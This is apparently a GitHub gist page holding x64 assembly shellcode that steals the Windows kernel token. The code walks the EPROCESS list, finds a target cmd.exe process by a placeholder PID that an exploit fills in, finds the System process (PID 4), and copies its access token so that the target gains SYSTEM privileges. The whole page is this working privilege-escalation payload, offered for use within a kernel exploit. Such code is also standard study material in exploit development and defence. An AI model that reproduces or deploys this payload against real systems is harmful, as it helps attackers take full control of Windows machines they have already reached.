Skip to content

Instantly share code, notes, and snippets.

@xpn
Created January 1, 2018 23:31
Show Gist options
  • Save xpn/8f993b3c4cca474d8ebe553f0e36a3e0 to your computer and use it in GitHub Desktop.
Save xpn/8f993b3c4cca474d8ebe553f0e36a3e0 to your computer and use it in GitHub Desktop.
[BITS 64]
push rax
push rbx
push rcx
push rsi
push rdi
mov rax, [gs:0x180 + 0x8] ; Get 'CurrentThread' from KPRCB
mov rax, [rax + 0x220] ; Get 'Process' property from current thread
next_process:
cmp dword [rax + 0x2e0], 0x41414141 ; Search for 'cmd.exe' process ('AAAA' replaced by exploit)
je found_cmd_process
mov rax, [rax + 0x2e8] ; If not found, go to next process
sub rax, 0x2e8
jmp next_process
found_cmd_process:
mov rbx, rax ; Save our cmd.exe EPROCESS for later
find_system_process:
cmp dword [rax + 0x2e0], 0x00000004 ; Search for PID 4 (System process)
je found_system_process
mov rax, [rax + 0x2e8]
sub rax, 0x2e8
jmp find_system_process
found_system_process:
mov rcx, [rax + 0x358] ; Take TOKEN from System process
mov [rbx+0x358], rcx ; And copy it to the cmd.exe process
pop rdi
pop rsi
pop rcx
pop rbx
pop rax
; return goes here
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment